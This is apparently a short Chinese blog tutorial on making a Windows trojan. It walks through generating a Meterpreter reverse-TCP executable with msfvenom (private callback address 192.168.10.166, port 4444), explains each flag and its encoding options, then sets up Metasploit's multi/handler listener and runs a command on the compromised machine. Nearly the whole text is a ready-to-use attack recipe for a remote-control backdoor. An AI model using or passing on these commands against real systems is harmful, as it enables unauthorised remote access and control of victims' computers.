废话不多说,直接上命令:
msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.10.166 lport=4444 -f exe -o /root/csdn.exe命令分解:
msfvenom #使用msf中msfvenom模块 -a #指定架构(x86指32位,x64为64位,建议x86,因为x64兼容x86,在不知道目标机架构的情况下x86更为合适) -p #指定payload(攻击载荷) lhost,lport: #指定shell返回的地址与端口 -f #指定生成格式 -o #指定生成位置与名称 拓展: -e #指定编码器 -i #指定编码次数 --platform #指定平台配置监听
### kali开启msf
命令:msfconsole
命令:use exploit/multi/handler
命令:show options
命令:
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.166
(payload,lhost,lport要与木马相同,这里端口号与我们制作木马时相同,就不需要在设置了,设置完建议再查看一下配置)
命令:exploit
(靶机要关闭防火墙,制作的的木马是没有免杀的,就算用了msf自带的编码也不能绕过杀软)
链接成功!!执行ipconfig试一下
执行成功!!



